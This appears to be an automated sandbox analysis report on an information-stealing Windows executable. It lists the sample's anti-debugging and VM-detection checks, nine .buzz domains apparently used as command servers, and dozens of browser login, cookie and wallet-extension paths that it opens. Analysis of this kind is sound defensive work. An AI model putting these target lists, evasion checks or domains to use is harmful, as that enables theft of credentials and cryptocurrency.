                Source: fer4JIJGeL.exe, 00000000.00000003.1608368655.0000000001835000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1619487508.0000000001835000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000002.1621848347.0000000001835000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1537869604.0000000001835000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1569973357.0000000001835000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1538416257.0000000001835000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1464348690.0000000001835000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1535594138.0000000001835000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1510871342.0000000001835000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-GBnd
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000005FFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000005FFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
                Source: fer4JIJGeL.exe, 00000000.00000003.1608368655.0000000001835000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1619487508.0000000001835000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000002.1621848347.0000000001835000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1537869604.0000000001835000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1619202286.00000000017F7000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000002.1621698002.00000000017F7000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1569973357.0000000001835000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1538416257.0000000001835000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1464348690.0000000001835000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1535594138.0000000001835000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000005FFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000005FFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000005FFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000005FFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000005FFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000005FFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000005FFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000005FFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000005FFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000005FFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000005FFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000005FFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000005FFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000005FFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000005FFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000005FFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                Source: fer4JIJGeL.exe, 00000000.00000002.1620112958.0000000000E14000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000005FFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000005FFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000005FFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: NTICE
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: SICE
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: SIWVID
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | Process queried: DebugPort

                HIPS / PFW / Operating System Protection Evasion

                Source: fer4JIJGeL.exe, 00000000.00000003.1416826075.00000000053E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: hummskitnj.buzz
                Source: fer4JIJGeL.exe, 00000000.00000003.1416826075.00000000053E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: cashfuzysao.buzz
                Source: fer4JIJGeL.exe, 00000000.00000003.1416826075.00000000053E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: appliacnesot.buzz
                Source: fer4JIJGeL.exe, 00000000.00000003.1416826075.00000000053E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: screwamusresz.buzz
                Source: fer4JIJGeL.exe, 00000000.00000003.1416826075.00000000053E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: inherineau.buzz
                Source: fer4JIJGeL.exe, 00000000.00000003.1416826075.00000000053E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: scentniej.buzz
                Source: fer4JIJGeL.exe, 00000000.00000003.1416826075.00000000053E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: rebuildeso.buzz
                Source: fer4JIJGeL.exe, 00000000.00000003.1416826075.00000000053E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: prisonyfork.buzz
                Source: fer4JIJGeL.exe, 00000000.00000003.1416826075.00000000053E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: mindhandru.buzz
                Source: fer4JIJGeL.exe, 00000000.00000002.1620112958.0000000000E14000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: _Program Manager
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: fer4JIJGeL.exe, 00000000.00000003.1570110856.0000000001812000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                Source: Yara match | File source: Process Memory Space: fer4JIJGeL.exe PID: 7656, type: MEMORYSTR
                Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
                Source: fer4JIJGeL.exe, 00000000.00000003.1537869604.0000000001835000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Electrum-LTC\wallets
                Source: fer4JIJGeL.exe, 00000000.00000003.1537869604.0000000001835000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\ElectronCash\wallets
                Source: fer4JIJGeL.exe, 00000000.00000002.1621761356.0000000001812000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Jaxx Liberty
                Source: fer4JIJGeL.exe, 00000000.00000003.1537869604.0000000001835000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: window-state.json
                Source: fer4JIJGeL.exe, 00000000.00000003.1537869604.0000000001835000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: fer4JIJGeL.exe | String found in binary or memory: ui"},{"en":"aholpfdialjgjfhomihkjbmgjidlcdno","ez":"ExodusWeb3"},{"en":"onho
                Source: fer4JIJGeL.exe, 00000000.00000003.1608368655.0000000001835000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/Ethereum
                Source: fer4JIJGeL.exe, 00000000.00000003.1510871342.0000000001871000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                Source: fer4JIJGeL.exe | String found in binary or memory: keystore
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.db
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqlite
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.json
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflа
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite
